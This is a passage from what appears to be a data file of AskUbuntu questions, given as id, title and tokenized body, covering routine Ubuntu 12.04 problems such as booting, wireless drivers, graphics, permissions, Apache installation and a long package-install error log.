verge of just figuring out how to log on as a sudo account permanently from start to finish , but i see all these warnings about that not being a good idea and that i should ask the ubuntu community before doing this , so i 'm posting my question now . please help . basically , i want to be able to run scripts that can do very basic things like back up files ( make zip archives of directories both locally of local files , and on a server of the server files ) , update files by comparing directories from local to server folders , and i am moving around and creating quite a bit of files through matlab as well . i do n't think it 's so complicated what i 'm trying to do , but i 'm having a real hard time sorting out this permissions issue . seems like it is coming up with everything that i do . thanks .
168597	how do i use a floppy drive in ubuntu ?	same computer , under ubuntu 8.04 no problem at all . under 12.04 , floppy drive is non existent for ubuntu . drive and floppy disquette works well on dos . computer boots from the floppy w98se , no problem at all . how i can use floppys under ubuntu 12.04 ? .
168598	just built a computer ; trying to install ubuntu from a flash drive	i 've just finished assembling my pc and i 'm trying to install ubuntu on it ( there is no operating system on this machine ) . i downloaded unetbootin on my mac , downloaded the .iso image , and ran unetbootin to put it on my flash drive . i plugged it in and ran into a lot of problems which i 'd like help/an explanation for ? 1- first time i tried to boot from my flash drive i got a unetbootin default lop which would start up every 10 seconds . i redownloaded ubuntu and plugged in my flash drive again . ubuntu started to install . 2- i got a `` apt configuration problem . an attempt to configure apt to install additional packages from the cd failed '' message during the middle of it . i clicked okay and then ubuntu said it was done installing and rebooted . 3- when i rebooted i got a black screen with a blinking cursor . i realized i left the usb drive in the computer so i removed and rebooted . 4- black screen of death again . rebooted went to bios , changed the boot order so it booted from the hard drive since i assumed ubuntu had installed already . 5- did n't work , rebooted a few times . the i came to a black screen prompting me to put in grub commands which is the stage i 'm at now . i tried to type boot but it said there is no loaded kernel ? please help ! i 'm really close to finishing off my first build and this is really alarming . edit : hardware i 'm using asrock 970 extreme3 motherboard amd athlon ii x3 450 cpu wd5003abyx 500gb 7200 rpm 64mb cache sata 3.0gb/s 3.5 '' hd pny vcggt4301xpb geforce gt 430 ( fermi ) 1gb 128-bit ddr3 pci express 2.0 x16 video card g.skill ripjaws series 4gb ( 2 x 2gb ) desktop memory model f3-12800cl9d-4gbrl
168602	ubuntu 12.04 stuck on log-in screen after updating openttd	i had updated openttd to the latest version however the update crashed in software center half-way through . i restarted my laptop but when i get to the log-in screen and after entering my password , a black screen is displayed with some text , which appears too quickly to read and then it takes me back to the log-in screen . this is repeated over and over and i can not log in . any suggestions ?
168606	how to install latest version of totem movie player ?	the one thing i 've found in ubuntu is how the default apps are not usually or easily updated . apps like rhythmbox and totem have gotten new releases since 12.04 came out and i was wondering if there 's a ppa or anything i can add so i can have totem and essentially other default apps up to date . thanks in advance !
168608	how to boot wubi installed ubuntu within windows 8 ?	i have windows 8 release customer preview on my laptop . i tried to install ubuntu on it with ubuntu windows installer ( i have always used this to install , although that was on windows 7 ) , it installs and asks to reboot , then immediately windows 8 boots up . i do not have the option to choose what os to boot . how can i boot to ubuntu ? vm is not exactly what i would like to use , but it is an option , however a last resort . any help ?
168609	compiz -- replace not finishing	i read online , to check if your compiz is running correctly , you should type compiz -- replace . i typed the command , and after it started , my screen flashed then disappeared then came back , and here is what the terminal is saying . alexander @ alexander : ~ $ compiz -- replace checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:10806 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done warn 2012-07-26 18:16:07 unity.libindicator :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-07-26 18:16:07 unity.libindicator :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-07-26 18:16:07 unity.libindicator :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . error 2012-07-26 18:16:08 unity.glib-gobject :0 g_object_unref : assertion `g_is_object ( object ) ' failed setting update `` run_command_terminal_key '' setting update `` fullscreen_visual_bell '' setting update `` num_launchers '' setting update `` launcher_capture_mouse '' it will not continue past that , and i have let it keep running for about 10 minutes .
168612	user that does not use password to login needs it to run a command	the user is set to login without a password . when trying to use that user to make a directory the user is asked to prvide a password . since they do n't have a password the system keeps rejecting them and denies them access to the command . is there a default password that may be in use ?
168616	browser hanging when copying large files	whenever i copy or move large files between disk partitions my firefox becomes unresponsive at random times during the process . is that normal for ubuntu ?
168620	low graphics mode- nvidia . no way to desktop	ive been looking around here and seen many variations of this error but none that have helped me . starting up gets me to a window telling me `` the system is running low graphics mode '' clicking ok gets me to a menu of four options , like reconfigure , troubleshoot , and exit to console login . these are all varying degrees of unhelpful . crt-alt-f1 gets me to text login , and sudo lspci tells me i have ( for vga compatible controller ) nvidia corporation gt218 [ geforce g210m ] ( rev a2 ) . i 'm on an asus laptop with an intel duo core . somewhere else i found how to update my drivers , but they are all up to date . any help appreciated . ( i do n't know if this goes without saying , but when i was testing it out from a cd ubuntu worked fine . it 's only now that i 've installed it alongside w7 that his is occurring ) .
168625	how to configure the left mouse click to select only part of directory in terminal ?	when i double click /this/is/a/directory it selects the whole string . it should only select the word i click . eg . if i double-click `` this '' then only `` this '' is selected . this is how ubuntu used to work a couple of versions previous . it has caused me endless frustration . it does this in both xterm and terminal . can anyone please help me out ?
168626	live cd customization queries	i have a few question related to customizng ubuntu 12.04 live cd using the tutorial given at https : //help.ubuntu.com/community/livecdcustomization . for me it was possible to modify till the section where we install new softwares ( section 6.1.2 ) to the live cd . after that i directly jump to advanced customization ( section 6.7 ) located at https : //help.ubuntu.com/community/livecdcustomization # advanced_customizations . my questions are : - 1 ) when i run the following command to mount the live cd , it shows a warning that the iso is mounted as read only . is it ok , or should it be writable ? 2 ) there are three folders created in the folder livecdtmp . they are edit , extract-cd and mnt . my questions are , which folder should i edit so that the change happens to the `` customized live cd '' , and which folder to edit to have the customized ubuntu installation ? 3 ) what is the use of extract-cd , edit and mnt folders ? 4 ) the tutorial says , to have a custom background for gnome , i have to edit /usr/share/gnome-background-properties/ubuntu-wallpapers.xml . which file , or the file in which folder should i edit for the change to happen both in live cd and the customized installation . 5 ) then , coming to the advanced customiation -- > kernel updation , once inside the chroot , i can not issue the following commands : - sudo cp edit/boot/vmlinuz-2.6.15-26-k7 extract-cd/casper/vmlinuz sudo cp edit/boot/initrd.img-2.6.15-26-k7 extract-cd/casper/initrd.lz it says , folder dos n't exist . should this be done from inside the chroot environment ? 6 ) the tutorial says that , in order to edit the inird.lz file , i have to perform the following steps . # cd extract-cd/casper # mkdir lztempdir # cd lztempdir # lzma -dc -s .lz ../initrd.lz | cpio -imvd -- no-absolute-filenames should this be done in chroot environment that we initially prepared ? does editing this file alone make changes to both the customized live cd as well as to the installation made from that live cd ? when i run the last command , i get the error , that there is a premature end of archive , or no file found ? from the # symbol , it means that i should run it within the chroot environment . but the problem is that , whenever i run the command cd extract-cd/casper , it says , there is no such directory which is actually true , because , what is mounted is the 'edit ' folder . so , what should be done ? 7 ) there are initrd.lz file in /casper folder in both 'extracr-cd ' and 'mnt ' . should i copy the kernel file to both these folders ? which one should i need to edit inorder to have updated kernel , new plymouth theme , etc ? 8 ) i wish to set gnome-classic to have in the live cd ? what should be done in order to have the gnome-classic in both the live cd and in the installation made with that cd ? 9 ) how to remove lightdm login screen and to have the gdm like login screen that was initially present in ubuntu till around 9.10 ? update : - when i ran the following command outside chroot , i get the following error . roshan @ roshan-studio-1558 : ~/initrd $ lzma -dc -s .lz ../livecdtmp/extract-cd/casper/initrd.lz | cpio -imvd -- no-absolute-filenames lzma : ../livecdtmp/extract-cd/casper/initrd.lz : file format not recognized cpio : premature end of archive
168627	connecting asus usb-n13 wireless adapter	i 'm trying to connect my desktop ( running 64-bit ubuntu 12.04 ) to an airport extreme base station by using an asus usb-n13 wireless adapter . i plugged it in , turned on the desktop , and the adapter was immediately recognized by the system . i found my home network listed in the available networks , typed my password ( with the correct encryption ) and hit connect . after that , the wireless icon just flashes ( propagates ? emits ? ) indefinitely , and every couple of minutes the `` wireless authentication required '' box pops back up . i do n't know what to do . i 've seen some solutions talking about an `` rt2xxx '' or `` rt3xxx '' driver or chipset . i do n't know exactly what it is , but when i typed lsmod | grep rt i got : parport_pc rtl8192cu rtl8192c_common rtlwifi mac80211 cfg80211 parport i 'm pretty much lost . please askubuntu , what do ?
168631	how to set windows the default os on dual boot system ?	i have installed ubuntu 12.04 alongside windows 7 ( in a separate partition ) . initially after booting , it shows me options to boot between windows 7 and ubuntu . but after updating ubuntu , it now boots by default to ubuntu . how do i make the default boot to windows 7 ?
168635	installing ubuntu on older computer	i am trying to install ubuntu on an older dell desktop from a cd . i put the cd in and select install from cd and a purple screen comes up with the ubuntu symbol and a progress bar but it appears to be stuck on this screen . the computer has a 2.8 ghz pentium 4 processor , 1 gb of memory , and a 500 gb hard drive . any help would be greatly appreciated .
168639	ubuntu 12.04 , sony vaio t11 , no hardware wifi button , networkmanager `` enable wireless '' unavailable	my sony vaio t11 does not have a hardware button to enable/disable wifi . when i disable wifi in networkmanager and reboot `` enable wireless '' is not available ( grayed out ) in networkmanager . $ > rfkill list wifi 0 : phy0 : wireless lan soft blocked : yes hard blocked : yes 1 : sony-wifi : wireless lan soft blocked : yes hard blocked : yes different to similar problems of this kind `` rfkill unblock all '' does not help . however i can boot into windows , start the wifi there and when i reboot to linux wifi is working again .
168643	failed to download repository information when updating in 12.04	i recently installed ubuntu 12.04 lts alongside an existing windows 7 system . when i am trying to update it is always showing an error message : `` failed to download repository information , check your internet connection . '' but i am sure that now i have an internet connection . what is the problem and how do i resolve it ?
168644	how do i get my sound card back ?	i have been fighting an annoying problem with my sound set up for a while now , and it 's suddenly taken a turn for the worst . i do n't know if this situation is related or not , but i think it might be a new problem , so i 'm starting a new question . as described in my other question , every time i start a youtube ( or any online video ) , i have to restart my pulseaudio server . however , this last time i did it , my pulseaudio server never came back . when i look at my sound settings , this is all i get : this is what my sound settings were before : how do i get my sound device back again ?
168646	how do i set up an ubuntu ftp server ?	i am very new at this , and i need help setting up an ftp server that i can connect to outside of my network . i have ubuntu server 12.04 installed , as well as webmin , and vsftpd . i just need help figuring out how to connect to my server and use it as a ftp server .
168648	how to transfer file permissions from one folder to another ?	i did cp -r on a folder ( copy ) , then removed the original . i have a backup with most of the files . how do i restore the permissions of the files & folders on the copy using the backup ? it would be very tedious to go in and do chmod xxx filename every single item in there .
168650	how do i list all storage devices ( thumb drives/external hard drives ) that are connected via usb , from the command line ?	i would like to list only devices connected via usb . the problem is that ubuntu seems to see all thumb drives as removable ( in /sys/block/*/removable ) , but it does not see external hard drives the same way .
168661	how can i re-enable touchpad after disabling it via touchpad indicator option	by mistake i turned off my laptop track-pad ( mouse ) in touchpad indicator option . is there a way i can re-enable the mouse or at least turn off the touch pad indicator extension so that mouse starts working .
168663	enabling or installing d-link dwm 156 broadband modem ?	no support for this usb broadband modem . does anyone have a clue on how to enable or install it in ubuntu 12.04 ? the device is listed by lsusb as 2001 : a80b but in network manager , there is nothing in there . device is detected in /dev/sr1 or sr2 and can be mounted with # mount /dev/sr1 or sr2 /media/ < mkdir your own directory > it contains various files . a file named `` dlinkusbmodem.deb '' is present . double clicking opens it in software center but gives error during installation . figures it is a 32-bit driver for 32-bit os . please help .
168667	how to avoid entering keychain password	how to avoid entering keychain password , without disabling autologin ?
168670	`` connection not visible or not available '' after switch dsl to lan	i had a company computer ( ubuntu 12.04lts ) taken home . my home use dsl and my company use lan to connect to internet . the computer works well in my company , but i have to config it after taken home . i used pppoeconf to config the dsl successfully at home . and use pon dsl-provider to connect to internet . but after i take the computer back to company , i had to change back to lan . after google it , i modified the file /etc/network/interfaces auto lo iface lo inet loopback auto dsl-provider iface dsl-provider inet ppp pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf provider dsl-provider auto eth0 iface eth0 inet manual to auto lo iface lo inet loopback # auto dsl-provider # iface dsl-provider inet ppp # pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf # provider dsl-provider # auto eth0 # iface eth0 inet manual but this does not work : when reboot the computer , the network-manager shows wired network already connected , but not show the `` wired connection 1 '' . ifconfig shows eth0 have ip address 192.168.1.108 , but can not connect to internet . i tried to add wired connection 1 manually , choose the mac of eth0 in device mac address , and save . it shows : connection add failed , connecttion not visible or not available . ( i thought it should work here . dhcp/manual ip addresses both works well several day before . ) i had several other tries : i changed the /etc/network/interfaces file to auto lo iface lo inet loopback # auto dsl-provider # iface dsl-provider inet ppp # pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf # provider dsl-provider auto eth0 iface eth0 inet manual still not work . and changed to some static ip address not work , either . i think that pppoeconf make some change to the network-manager configuration or networking config , so that after stopped pppd , the network-manager does not work . please give me some advices , thanks !
168687	wireless configuration using /etc/network/interfaces documentation	i followed the tutorial here and was able to properly configure my network : http : //ubuntuforums.org/showthread.php ? t=202834 & page=181 i know of the documentation in /usr/share/doc/wireless-tools/readme.debian , but it does n't detail the options that were used . where can i find the documentation for the settings that were used ? for example , where can i find the documentation on the options ( wpa-ssid , wpa-psk , etc . ) ?
168688	set default music player to banshee , yet it 's still rythmbox ?	i kind of have two questions , that tie into each other . i want to set banshee as the default music player . it seems simple enough . go to `` systems settings > details > default applications '' and change `` music '' from `` rhythmbox '' to `` banshee '' . but , this did not work . how do i make this work ? how do i uninstall rhythmbox ? i tried uninstalling it from the ubuntu software center , yet rhythbox updates still showed up in my `` system updates . '' i do n't want that . thanks !
168690	how can i get into linux mint system not recognizing my password ?	i installed linux mint 12 and i am sure of my password , but it does not agree with me and `` incorrect password number of successful attempts ; system halted must power down '' how can i get into the system to see what 's happened or to make a change ?
168695	is there any hotkey for empathy ?	is there any hotkey for empathy ? plugins is also ok ? i want open a message with shortcut just like press f4 , i can do that in pidgin , but i prefer empathy
168706	how do i auto-login as root into the tty upon boot ?	i am working on creating a real time kernel with rt-preempt patch . i have created this kernel without graphic desktop . it comes up in the terminal mode with login prompt . the requirement is , it should boot and directly go to the shell prompt with root permission , without asking for login . how can this be done ? can you help me ?
168708	touchpad in sony vaio e14 - can not click with a finger and drag with another - ubuntu 12.04	i had the following issues with my sony vaio e14115 's touchpad on ubuntu 12.04 : right click not working vertical scrolling not working then i followed these steps to fix it : downloaded a patch for psmouse sudo apt-get install dkms build-essential cd ~/desktop tar jxvf psmouse-3.2.0-24-generic-pae.tar.bz2 sudo mv psmouse-3.2.0-24-generic-pae /usr/src cd /usr/src sudo chmod -r a+rx psmouse-3.2.0-24-generic-pae sudo dkms add -m psmouse -v 3.2.0-24-generic-pae sudo dkms build -m psmouse -v 3.2.0-24-generic-pae sudo dkms install -m psmouse -v 3.2.0-24-generic-pae sudo modprobe -r psmouse sudo modprobe psmouse this fixed me the problems of rightclick and vertical scrolling . but i still have an issue of not able to click and drag ie clicking the leftmouse button and dragging with another finger . it does n't move ! maybe it does n't detect the 2nd finger . when i check the capabilities of my synaptics touchpad by using xinput list-props `` synps/2 synaptics touchpad '' |grep capabilities i get the following output : synaptics capabilities ( 304 ) : 1 , 1 , 1 , 1 , 1 , 1 , 1 please help me out .
168709	what folders to restore from backup ?	my old computer , with ubuntu 10.04 , crashed , and i installed ubuntu 12.04 on a new computer . luckily , i have a full backup of my previous file system . however , i do n't know what folders exactly i need to restore ( except the home folder , of course ) , since restoring the wrong files might damage the new files that came with the fresh installation . i suppose that if i understand what each folder is used for , i can know whether it makes sense to restore it . specifically , i would like to know about the following folders : /boot - what is it ? should i restore it ? ( my 12.04 computer currently boots ok ) . /etc - contains a lot of folders , most of them also exist on my 12.04 computer . should i just restore all the /etc folder ? should i do it before or after i install the relevant applications ? /etc/apache2 - i changed some configurations . however , the i already installed apache2 on my 12.04 computer , and the configuration files look different . probably the new version of apache2 has some new configurations . should i just merge each file manually ? same question with /etc/mysql . /var/backups - contains some files i do n't recognize , such as aptitude.pkgstates. , dpkg.status. , group.bak , shadow.bak , etc . most of them already exist on my new /var/backup . who creates those files , and who users them ? do i need to restore them ? /var/cache - many folders that i do n't recognize . who created them ? who uses them ? should i restore them ? /var/lib - again , many folders that i do n't recognize . specifically : /var/lib/mysql - contains my old databases . is it safe to just copy all of them ? should i do this before or after i re-install mysql ? are they compatible with the new version ? ( i had 5.1 , the current version is 5.5 )
168710	how to maximize windows to the middle monitor with three monitors	i 've installed ubuntu 12.04 lts and most things are running smoothly . i 've managed to set up my three monitors using ati 's catalyst control center . however , i run into problems when i try to maximize windows to my middle monitor - namely , it seems impossible . modifying the realtive positions of the monitors using ccc seems to temporarily fix the problem , but the `` solution '' does not persist over restarts . how can i fix this ? thanks .
168716	live cd booting to initramfs : medium problem ?	i am trying to boot a 12.04 , 32 bit french version of the live cd , however it drops me to an initramfs prompt . if i look at the dmesg output , i have some cdrom i/o error ( sr0 device ) . if i check the md5sums , they are all good , except for a file : ./isolinux/16x16.fnt should i retry burning a cd ?
168720	display xubuntu desktop on android tablet	i want to use my android tablet as a secondary display for my xubuntu laptop , not to mirror the laptop but as an additional desktop -- i do not need to drag windows from one to the other , and it is okay to run the android session as a separate login . ideally i would like to use the keyboard/mouse of the desktop for the android session , but i can live without . if possible i would like the connection be made via usb instead of wifi ( to help save battery ) . on the askubuntu archive i found a post with almost the same title & question how do you use an android tablet as a second display ? the answer is to ( 1 ) install vnc4server on the laptop , ( 2 ) get a vnc client on android , ( 3 ) connect the two , and ( 4 ) share keyboard and mouse using synergy . i have done ( 1 ) and ( 2 ) , and following http : //superuser.com/questions/182261/how-to-change-virtual-screen-resolution-on-ubuntu-connecting-via-vnc-without-re/187274 # 187274 i started the vnc server using vncserver :12 -name `` my-server '' -geometry 1024x600 unforunately i 'm not sure how to proceed with ( 3 ) and ( 4 ) . i tried to initiate the vnc session on the android by firing up `` androidvnc viewer '' , but i do n't know what to enter for port ( default seems to be 5900 ? ) and address . also , what should i use for `` color format '' -- 24bit or 16bit ? speaking of address : as i said if possible i would like to connect the tablet and the laptop via usb . what should i use for address ? alternatively , what address should i use if i need to connect the two via wifi ? in case that matters , i could be working in setups where neither devices have internet connection to the outside world ( ! ) . last but not least , upon reading old posts about vnc i found discussions about tunnelling vnc over ssh how do i start the vnc server ? the post above uses x11vnc ; is there a similar option for vnc4server , and how would i proceed on the android side ? i also found http : //www.cyberciti.biz/tips/tunneling-vnc-connections-over-ssh-howto.html but i 'm not sure how to incorporate that into steps ( 1 ) - ( 4 ) . there is also the question of using synergy , but that 's probably for another post : - ) thank you for you help and patience .
168724	ubuntu 12.04 not booting as it should	good day all , i have made the choice to reinstall my pc and use ubuntu 12.04 as the actual os and not win . usually i used ubuntu in a vm to play around and ready my knowledge for when when or rather if i would use it as the main os of my system . a few days ago i loaded ubuntu on a laptop of mine for use as a web test server and internet sharing . this laptop gives me no problems apart from that it is old . however , i got myself a new pc a few weeks ago and decided to load ubuntu on it now . after a hassle i was able to install the system on the pc by disabling a few boot options in the install screen of ubuntu ( f6 ) . when i start the system up now it loads the usual orangy background but stays on that . no login no no nothing . the only way i managed to fix this was boot and load recovery mode and from there select `` the top option '' to continue the boot . i do n't mind this , as i know that nearly no one will figure out this process , so my pc will be secure . but the process is redundant and time consuming having to wait to time the shift keystroke perfectly . can anyone point me to a solution for this ?
168730	cpu temp on ubuntu 12.04 higher than on windows 5-10c in `` normal usage ''	this is something that i 've been seeing on older ubuntu versions , too . i bought a new laptop recently and am seeing the same old thing . it 's asus k53s with i7 2670qm processor , 8g ram and a somewhat slow hdd ( 5400rpm ) . while surfing the web with ~5 tabs , on windows , my core temp is on avg ~51c , and on ubuntu it stays at ~56c . when installing new software etc it gets higher , but i guess it 's something to be expected . any ideas why the difference and can i somehow lower it ( without undervolting ) ? thanks
168731	problem to install apache 2.4.2 in ubuntu 12.04	i followed these steps to install apache 2.4.2 in ubuntu 12.04 , but it seems apache is not installed , here 's what i did ( i followed the steps on this site http : //www.discusswire.com/apache-2-4-installation-ubuntu/ ) : sudo apt-get install build-essential sudo apt-get build-dep apache2 wget http : //apache.mirrors.pair.com/httpd/httpd-2.4.2.tar.gz tar -xzvf httpd-2.4.2.tar.gz & & cd httpd-2.4.2 sudo ./configure -- prefix=/usr/local/apache2 -- enable-mods-shared=all -- enable-deflate -- enable-proxy -- enable-proxy-balancer -- enable-proxy-http -- with-mpm=prefork sudo make sudo make install when i tried to start by issuing sudo /usr/local/apache2/bin/apachectl start at terminal , i got the following warning : ah00558 : httpd : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message '' and when i typed **top** at terminal , the apache is not there . i also tried to go to < code > http : //localhost/ < /code > or 127.0.0.1 or even 127.0.1.1 it showed `` ca n't establish connection to server ... '' message . p.s . : i checked the error log and it showed [ fri jul 27 15:49:00.703901 2012 ] [ proxy_balancer : emerg ] [ pid 20781 ] ah01177 : failed to lookup provider 'shm ' for 'slotmem ' : is mod_slotmem_shm loaded ? ? [ fri jul 27 15:49:00.704083 2012 ] [ : emerg ] [ pid 20781 ] ah00020 : configuration failed , exiting '' what am i missing ?
168732	python popen image viewer	using a python script , i want to be able to open an image and close it on ubuntu . looking at the answer here : http : //stackoverflow.com/questions/6725099/how-can-i-close-an-image-shown-to-the-user-with-the-python-imaging-library specifically this line : viewer = subprocess.popen ( [ 'some_viewer ' , infile ] ) what should i put as the 'some_viewer ' ?
168733	glade radio buttons save state	i 'm writing small application where i have preferences and in preferences i have radio buttons ... i managed to get signals out from them but the only problem i got is saving state of them . as this is preferences i need to have these buttons to stay selected when clicked and when program is closed and open again it need to be where it was . forgot to mention i 'm writing it in python . thanks for any help . simon
168735	i ca n't update or install any software or packages in my ubuntu 11.10	the installation or removal of a software package failed . installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 243832 files and directories currently installed . ) preparing to replace isc-dhcp-client 4.1.1-p1-17ubuntu10.1 ( using ... /isc-dhcp-client_4.1.1-p1-17ubuntu10.3_i386.deb ) ... unpacking replacement isc-dhcp-client ... preparing to replace isc-dhcp-common 4.1.1-p1-17ubuntu10.1 ( using ... /isc-dhcp-common_4.1.1-p1-17ubuntu10.3_i386.deb ) ... unpacking replacement isc-dhcp-common ... preparing to replace bind9-host 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /bind9-host_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement bind9-host ... preparing to replace dnsutils 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /dnsutils_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement dnsutils ... preparing to replace libisc62 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /libisc62_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement libisc62 ... preparing to replace libdns69 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /libdns69_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement libdns69 ... preparing to replace libisccc60 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /libisccc60_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement libisccc60 ... preparing to replace libisccfg62 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /libisccfg62_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement libisccfg62 ... preparing to replace liblwres60 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /liblwres60_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement liblwres60 ... preparing to replace libbind9-60 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /libbind9-60_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement libbind9-60 ... preparing to replace bind9utils 1:9.7.3.dfsg-1ubuntu4.2 ( using ... /bind9utils_1 % % 3a9.7.3.dfsg-1ubuntu4.3_i386.deb ) ... unpacking replacement bind9utils ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up samba4 ( 4.0.0~alpha17~git20110807.dfsg1-1ubuntu1 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory administrator password will be set randomly ! unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` passdb backend '' ignoring unknown parameter `` passdb backend '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` passdb backend '' ignoring unknown parameter `` passdb backend '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' traceback ( most recent call last ) : file `` /usr/share/samba/setup/provision '' , line 256 , in < module > useeadb=eadb , next_rid=opts.next_rid , lp=lp ) file `` /usr/lib/pymodules/python2.7/samba/provision/__init__.py '' , line 1602 , in provision sitename=sitename ) file `` /usr/lib/pymodules/python2.7/samba/provision/__init__.py '' , line 584 , in guess_names raise invalidnetbiosname ( netbiosname ) samba.provision.invalidnetbiosname : the name ''vigneshmoha-vpcea13en '' is not a valid netbios name dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up isc-dhcp-common ( 4.1.1-p1-17ubuntu10.3 ) ... setting up isc-dhcp-client ( 4.1.1-p1-17ubuntu10.3 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up libisc62 ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up libdns69 ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up libisccc60 ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up libisccfg62 ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up libbind9-60 ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up liblwres60 ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up bind9-host ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up dnsutils ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... setting up bind9utils ( 1:9.7.3.dfsg-1ubuntu4.3 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : samba4 setting up samba4 ( 4.0.0~alpha17~git20110807.dfsg1-1ubuntu1 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory administrator password will be set randomly ! unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` passdb backend '' ignoring unknown parameter `` passdb backend '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` 